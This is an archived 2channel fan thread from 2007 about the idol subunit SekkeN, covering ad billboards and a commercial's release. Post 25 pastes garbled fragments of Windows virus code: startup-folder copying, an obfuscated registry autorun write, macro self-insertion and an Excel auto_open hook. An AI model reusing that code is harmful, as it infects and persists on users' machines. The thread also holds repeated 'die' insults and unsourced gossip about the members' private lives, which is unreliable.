5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

SekkeN【353】

1 :ユー&名無しネ:2007/05/28(月) 14:44:46 ID:xeYJqyB9
◆お約束◆
■■石鹸スレの引越しは>950を踏んだ人が行ってください■■
誰がイラネ話、他Gユニとの比較、デブG話、他タレ話禁止!
担決め厨・荒らし・釣り師はスルー! 他スレ不干渉!
モメサが来たら完全に無視して孤独死させろ!
反論したりAA貼ったりしても喜ぶだけなので無駄レスはやめましょう!
●実況厳禁!!=「今から○○に出る!」という書き込みも実況とみなされるので禁止!
 ※CMの場合は提供番組が終わるまでダメ
 ※番組の場合は石鹸の出番が終わっても番組が終わるまでは感想も書いたらダメ
【実況に取られそうな発言】も混乱を招きやすいため控えるように

前スレ
SekkeN【352】 http://tv11.2ch.net/test/read.cgi/jr/1179317463/

【石鹸担専用実況板】
http://jbbs.livedoor.jp/music/14516/
【関連サイト】
・石鹸まとめサイト http://sekken8.exblog.jp/
・石鹸担のカレンダー http://music.geocities.jp/sekken2006jp/

2 :ユー&名無しネ:2007/05/28(月) 14:47:03 ID:J3pCqh5B
糞石鹸死ね\(^o^)/

3 :ユー&名無しネ:2007/05/28(月) 14:52:14 ID:fZGq4qZQ
石鹸担「什の掟」

一 石鹸麺の言うことに背いてはなりませぬ
ニ スレ立て者にはお辞儀をしなければなりませぬ
三 ソースのない不確定な虚言を言ふことはなりませぬ
四 麺叩きや担決め他タレの悪口など卑怯な振舞をしてはなりませぬ
五 仕事の有無や数字で比較して弱い者をいぢめてはなりませぬ
六 文章に全角やゴミなど余計な物を付けてスレを汚してはなりませぬ
七 sageてないミドリ厨や安置モメサ釣りなどと言葉を交えてはなりませぬ

  『ならぬことはならぬものです』

4 :ユー&名無しネ:2007/05/28(月) 14:54:54 ID:J3pCqh5B
糞石鹸さっさと氏ね(≧▽≦)

5 :ユー&名無しネ:2007/05/28(月) 14:56:27 ID:tsfjP7JA
今度は誰が犯罪を犯してくれるのかな?
wktk

6 :ユー&名無しネ:2007/05/28(月) 15:01:41 ID:J3pCqh5B
( ゚ Д゚)一度死んで〜また〜生き〜返るぬ〜



生き返らないで逝ってよし!

7 :ユー&名無しネ:2007/05/28(月) 15:29:54 ID:/xqjy/i6
ID:J3pCqh5B

NG推奨

8 :ユー&名無しネ:2007/05/28(月) 16:23:13 ID:yXJmuYju
>1
乙カレルヤ

9 :ユー&名無しネ:2007/05/28(月) 16:37:38 ID:J3pCqh5B
NG推薦されちゃったよー\(^o^)/

10 :ユー&名無しネ:2007/05/28(月) 16:59:55 ID:MAyDI1W7
前スレ1000見て真の石鹸担は麺も担もエエ子やなあと思いますた

11 :ユー&名無しネ:2007/05/28(月) 17:07:49 ID:J3pCqh5B
Pチャソ以外は逝ってよし\(^o^)/

12 :ユー&名無しネ:2007/05/28(月) 18:44:56 ID:N0oarmke
エロちゃん以外は逝ってヨシ

13 :ユー&名無しネ:2007/05/28(月) 19:30:26 ID:GRtI0jyZ
>3
乙です
前スレ1000GJ!

14 :ユー&名無しネ:2007/05/28(月) 19:45:04 ID:J3pCqh5B
特にエロ屁℃は逝ってよし\(^o^)/

15 :ユー&名無しネ:2007/05/28(月) 19:47:13 ID:J3pCqh5B
強いて言えばエロ逝ってよし\(^o^)/

16 :ユー&名無しネ:2007/05/28(月) 19:48:13 ID:J3pCqh5B
やっぱりエロは逝ってよし\(^o^)/

17 :ユー&名無しネ:2007/05/28(月) 19:49:56 ID:J3pCqh5B
とにかくエロは逝ってよし\(^o^)/

18 :ユー&名無しネ:2007/05/28(月) 19:50:52 ID:J3pCqh5B
ついでに屁℃も逝ってよし\(^o^)/

19 :ユー&名無しネ:2007/05/28(月) 19:52:04 ID:J3pCqh5B
エロ屁℃まとめて逝ってよし\(^o^)/

20 :ユー&名無しネ:2007/05/28(月) 19:54:18 ID:J3pCqh5B
逝ってよしシリーズれす\(^o^)/

21 :ユー&名無しネ:2007/05/28(月) 19:57:00 ID:J3pCqh5B
誰かエロの逝ってよしスレ作ってちょーらい><

22 :ユー&名無しネ:2007/05/28(月) 19:58:00 ID:J3pCqh5B
P担ヨロ\(^o^)/

23 :ユー&名無しネ:2007/05/28(月) 20:00:11 ID:J3pCqh5B
規制されるー\(^o^)/

24 :ユー&名無しネ:2007/05/28(月) 20:07:24 ID:pUOC19MF
頑張ってる姿を見て〜何だかふと勇気わいた気分〜♪

あえてのチラ裏
石鹸麺みんなスチダヨ
Pもテゴマスも必ずNEWSのってつけるのはみんな目標が同じ仲間だから…℃っくんも笛と石鹸について熱く語るって言ってた
どこからが深山になるのかシラネがみんなの目標ジャマするフルダヌキより今を応援するヤシらの方がマトモ

25 :ユー&名無しネ:2007/05/28(月) 20:33:27 ID:WDxOU6IZ
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


26 :ユー&名無しネ:2007/05/28(月) 23:06:30 ID:/5dE2Mot
ポーサンはいつになったら自分の日記の更新時間を知るんだろう?

27 :ユー&名無しネ:2007/05/28(月) 23:12:41 ID:g0+wNCih
ソイエは相変わらず学部の友達とカラオケに行ったりボーリングに行ったりしてるらしいな
二十歳の誕生日までにあと1回か2回は問題起こしそうで心配
今度問題が起こったら確実に石鹸は解散だから

28 :ユー&名無しネ:2007/05/29(火) 00:22:47 ID:7FrE3bhx
P斗ktkr

29 :ユー&名無しネ:2007/05/29(火) 01:58:25 ID:t1wwJrvD
>24
秀同
ナリとか自己中担鬱担ウンザリ
石鹸についてホコ〜リマタ〜リ話したいよ

30 :ユー&名無しネ:2007/05/29(火) 02:57:17 ID:SX/dtLMt
494 :名無しさんは見た!@放送中は実況板で :2007/05/29(火) 01:26:58 ID:hF9S3yC50
日9
麻生祐未 佐田真由美 八嶋 高田延彦 NEWSの加藤

ソースはmixi

31 :ユー&名無しネ:2007/05/29(火) 03:20:18 ID:sXxR1WXJ
>30
日9は館ひろし&ガッキー(2ネームシラネで決定済のはずだが

32 :ユー&名無しネ:2007/05/29(火) 03:57:01 ID:h6tEIKFb
>31
>30はそれの共演者ってことじゃないか?

33 :ユー&名無しネ:2007/05/29(火) 06:32:34 ID:YTl/N/kj
日9はもうジャニが出ないと思ってたけど

34 :ユー&名無しネ:2007/05/29(火) 08:31:30 ID:bkoOHOKd
これだけお抱えGが増えると
そうも言っていられないんジャマイカ?
主役じゃないし。

35 :ユー&名無しネ:2007/05/29(火) 08:37:03 ID:CjeDgcgy
ソースのないネタに食いつくな

36 :ユー&名無しネ:2007/05/29(火) 10:30:32 ID:BtQqy0G/
TBC看板キター

37 :ユー&名無しネ:2007/05/29(火) 11:39:03 ID:ik//4Eiv
タレント図鑑2007に書いてあったんだけど夏に紺やるみたいだよ。
℃以外でやるって書いてた

38 :ユー&名無しネ:2007/05/29(火) 12:16:02 ID:YOVJIzeb
夏コンはムリ
WCバレーデブがらみで大掛かりなイベはできない

39 :ユー&名無しネ:2007/05/29(火) 12:35:00 ID:YTl/N/kj
今年バリボデブがあるかどうか知らないけど
石鹸夏紺とは関係ないよね

40 :ユー&名無しネ:2007/05/29(火) 13:10:30 ID:qva9TtL0
TBC看板ってどこかにあるのか?

41 :ユー&名無しネ:2007/05/29(火) 13:57:09 ID:BtQqy0G/
駅にデッカイ看板貼ってあった

42 :ユー&名無しネ:2007/05/29(火) 14:23:03 ID:avpqZ8mv
>31
ガッキーに2ネームって…馬鹿?w
2ネームってのはジャニタレにしかないんだよウマシカ石鹸担w

43 :ユー&名無しネ :2007/05/29(火) 15:09:19 ID:GV2+XPsm
TBC看板?

44 :ユー&名無しネ:2007/05/29(火) 16:29:37 ID:y7P6eC8K
>42
つのっぺり

45 :ユー&名無しネ:2007/05/29(火) 17:29:06 ID:jsV3zsnI
既出だったらスマソ
DDDてダンス雑誌に鰯

46 :ユー&名無しネ:2007/05/29(火) 21:13:47 ID:Ev/Qjktp
看板見た人viviと同じ写真だった?
あと良ければ何駅で見たか教えてくれると嬉しい

47 :ユー&名無しネ:2007/05/29(火) 21:29:16 ID:BtQqy0G/
看板は雑誌と同じ写真
場所はポーサンの出身県の田舎駅にあった

48 :ユー&名無しネ:2007/05/29(火) 22:01:23 ID:b5Z3ddVy
ポーサンが正面向いてるバージョン
雑誌のMOREで見たよ

ポーサン横顔バージョンと正面バージョンがあるみたい

49 :ユー&名無しネ:2007/05/29(火) 22:12:38 ID:f8YffQm+
>48
他のメンは同じ写真なの?

50 :ユー&名無しネ:2007/05/29(火) 22:34:27 ID:b5Z3ddVy
>49ポーサン以外は同じだと思う
ちなみにCM解禁は6/1

51 :ユー&名無しネ:2007/05/29(火) 22:48:05 ID:jjFyv7t5
>50
6/1ってドコ情?

52 :ユー&名無しネ:2007/05/29(火) 23:07:35 ID:f8YffQm+
>50
d

53 :ユー&名無しネ:2007/05/29(火) 23:45:07 ID:rETGvqm9
看板は一斉に代わるのではないみたいだな
都内ではアキバだけ?渋谷新宿品川あたりはまだなのか

54 :ララにゃん从。・∀・。从 ◆85Hpe6ifO6 :2007/05/30(水) 07:05:12 ID:UDShhxdL
電車の中NEWSだらけになりますね^^山手線ジャック^^
http://decomaru.kirara.st/m/99_image/imagep.php?rd=465c9efab8e19

55 :ララにゃん从。・∀・。从 ◆85Hpe6ifO6 :2007/05/30(水) 07:10:17 ID:UDShhxdL
>53
目黒と五反田と新小岩にも貼ってありますよ^^

56 :ユー&名無しネ:2007/05/30(水) 10:23:13 ID:PpSbe5nx
よそからの拾い物で携帯でしか見れないがTBCCM
http://f.pic.to/b57q4

57 :ユー&名無しネ:2007/05/30(水) 11:16:06 ID:TO52oLsO
携帯からだけど見れない…そんなに古い機種じゃないのにorz

58 :ユー&名無しネ:2007/05/30(水) 11:17:23 ID:O+w8KExT
>56
dd
なんか鰯がカコエエ

59 :ユー&名無しネ:2007/05/30(水) 11:40:46 ID:SfvwpYtb
もうWSで流れたの?

60 :ユー&名無しネ:2007/05/30(水) 11:48:14 ID:qOmsV6Nh
解禁が6/1なんだからまだどこでも流れてない
マガ発行者が横流ししたんデソ
解禁前なのに企業も迷惑だよな

61 :ユー&名無しネ:2007/05/30(水) 12:18:23 ID:/bJYePpi
>56
見れないけど削除されたかな

62 :ユー&名無しネ:2007/05/30(水) 15:38:46 ID:pm+UUxJM
>61
そうだとオモー

63 :ユー&名無しネ:2007/05/30(水) 15:39:56 ID:qAt2t2yx
じゃWSは明日かあさってぐらい?
またのりかサンと被らなくてヨカタダナ

64 :ユー&名無しネ:2007/05/30(水) 17:05:45 ID:msd/UI6o
池袋巣鴨駒込にも駅ポスターあった。
池袋はWで。

65 :ユー&名無しネ:2007/05/30(水) 18:20:03 ID:/bJYePpi
>65
d

明日あたりから録画待機ノシ

66 :ユー&名無しネ:2007/05/30(水) 18:20:44 ID:zJibGT+6
897 名前:ユー&名無しネ[sage] 投稿日:2007/05/30(水) 08:53:45 ID:l2tp1bD+
浅海だにょん(・∀・)
スペシャル配信するょん

血需日解禁
メディアより先に初公開ッ
NEWSTBC新CMッッ

http://f.pic.to/b57q4

林檎ちゃんからだょッ
CM山下マジキモくない?ワラ何で一人だけ上半身裸なんだしハ


林檎ちゃんは浅海と同じマジにリアルな素晴らしき人と繋がってるんだょ
だから話がヤバすぎるくらい合う(゚Д゚)まさにシンデレラガールだょ(≧∀≦)



成は駐禁されすぎだしソ
貴久は彼女とラブラブだし
小山はFRYデーに載りかけるし
錦はClubで赤西軍団とつるみまくりだし、
手越は某アイドルと良い感じだしラ
山下も意外な女芸能人と仲良くなってるしマ

ちょっと暴露してみたけど(^∇^)こんくらいならへーき平気袋ラ


草海

67 :ユー&名無しネ:2007/05/30(水) 18:48:45 ID:6YY/hE4V
ゴミ付きにレスしてるヤシもマガ厨も出てけ
二度と来るな

68 :ユー&名無しネ:2007/05/30(水) 20:24:57 ID:Jm+913Pj
升にはワイルドやっぱり無いのか(w
アイドルって言葉が似合うって自分で言っちゃうところがカワエエ

69 :ユー&名無しネ:2007/05/30(水) 20:29:56 ID:7er+bHxy
CM見られたけど音声が聞こえない
早く新曲聴きたいのに…orz

70 :ユー&名無しネ:2007/05/30(水) 20:46:53 ID:GVOU3XEX
さすが石鹸
石鹸になったら解禁前に画像流失
事務所のゴリプして使ったTBCも迷惑だよね
さすが犯罪グループ画像も盗んで晒しています
こんなの使いたくないよね

71 :ユー&名無しネ:2007/05/30(水) 20:52:24 ID:djcOzXpC
石鹸使うとろくなことないな
事務所に言わないとワラ

72 :ユー&名無しネ:2007/05/30(水) 21:32:24 ID:v+iaZWwf
升禿キャワだな

升また連載キポン

73 :ユー&名無しネ:2007/05/30(水) 22:05:18 ID:/EYKxgFE
エロのヅサツまだー?\(^o^)/

74 :ユー&名無しネ:2007/05/30(水) 22:36:20 ID:jIQOKlkM
明日でエロ升連載も終わりかサミシス
笛ヌコ始まらないかな

75 :ユー&名無しネ:2007/05/30(水) 23:19:18 ID:FoWvAHY5
加齢臭漂うアンチだね(w

76 :ユー&名無しネ:2007/05/30(水) 23:19:54 ID:wNy8d+QI
CMが 禿 wktk
映像以上に何の曲が使われてるかだな

77 :ユー&名無しネ:2007/05/30(水) 23:30:49 ID:I2Sj+SKQ
どの番組張っとけば確実?

78 :ユー&名無しネ:2007/05/30(水) 23:59:44 ID:92TZQhh6
>77めざまし

79 :ユー&名無しネ:2007/05/31(木) 00:04:35 ID:6pofx9DT
TBC
ttp://vista.rash.jp/img/vi7957960866.jpg


80 :ユー&名無しネ:2007/05/31(木) 01:30:19 ID:gBkoqfGS
6/5って何かあったかな

81 :ユー&名無しネ:2007/05/31(木) 05:39:14 ID:/96DZd6b
>80
つnon-no


82 :ユー&名無しネ:2007/05/31(木) 07:52:01 ID:gBkoqfGS
>81
dd
そうダタ

83 :ユー&名無しネ:2007/05/31(木) 09:13:39 ID:GqsNneNE
教えてチャンでスマソ
たこやきでTBC看板見たネエサンいる?

84 :ユー&名無しネ:2007/05/31(木) 12:53:44 ID:PojTLxot
ポーさんの仕事があるから夏はユニ仕事がないわけか

85 :ユー&名無しネ:2007/05/31(木) 14:24:32 ID:PN93bySh
だから℃は環八に専念なんだな
CDは夏に出るはずなのでwktkしておく

86 :ユー&名無しネ:2007/05/31(木) 14:32:46 ID:p/6EHD5W
はいはい
モメサ乙

87 :ユー&名無しネ:2007/05/31(木) 14:54:04 ID:5lZsdBIk
どこがモメサ?
夏にユニ仕事が無いのは分かってた事ジャン
CMあるし新曲をwktkしながら待つよ
スルー出来ずに過剰に反応するヤシこそ出てけ

88 :ユー&名無しネ:2007/05/31(木) 15:14:51 ID:Sua9S6gW
でも夏に新曲出るかどうかまだソースないんだけど!(ё)ノシ

89 :ユー&名無しネ:2007/05/31(木) 15:54:17 ID:E33D7+Nn
>88
おまいは新曲出るまで今の「カレーともんじゃ」歌ってなさいお(w

90 :ユー&名無しネ:2007/05/31(木) 16:37:22 ID:sUFSqbT0
7月に環八側に少し休みがあるそうだから℃っくんも含めての石鹸活動あるんじゃないか?

91 :ユー&名無しネ:2007/05/31(木) 17:49:23 ID:aFq484x9
>84
ポースレになんもないけど夏の仕事って?


92 :ユー&名無しネ:2007/05/31(木) 17:56:45 ID:cN2Zhxw5
>91
何でもポーサンのせいにしたいだけだろ
相手にするな
それに先輩タレはフツーにドラマも映画も紺もこなしてる


93 :ユー&名無しネ:2007/05/31(木) 18:14:14 ID:aFq484x9
>92
逆にポーサンが白虎隊みたいなかかりっきりの仕事があるなら
夏に石鹸仕事なくてもしょうがないねーで済むけど
今のとこ何も聞かないし他の4人も聞かないから夏の予定立てにくいんだけどね

94 :ユー&名無しネ:2007/05/31(木) 18:22:48 ID:D6FEIzSF
升更新なし?

95 :ユー&名無しネ:2007/05/31(木) 18:36:14 ID:WtkhBu08
遅れる時って事務所の検閲に引っかかってる時じゃない?
写真があるとか

いよいよ明日CM解禁だなwktk
WSでメイキングはやってくれないんだろうか


96 :ユー&名無しネ:2007/05/31(木) 18:43:45 ID:QmakUNPW
ポーサンは七月下旬から映画だってば

97 :ユー&名無しネ:2007/05/31(木) 19:12:35 ID:aFq484x9
>96
へぇ
まずポースレに落としてみたら?
TV局関係者いるみたいだから

98 :ユー&名無しネ:2007/05/31(木) 19:13:38 ID:ttMxC7VM
>94
更新してるよ

99 :ユー&名無しネ:2007/05/31(木) 19:18:33 ID:LMbZ0yJm
まだCM6/1解禁がどこの情報かはっきりしていない件

100 :ユー&名無しネ:2007/05/31(木) 20:59:43 ID:xjVJqdvp
100〜

167 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)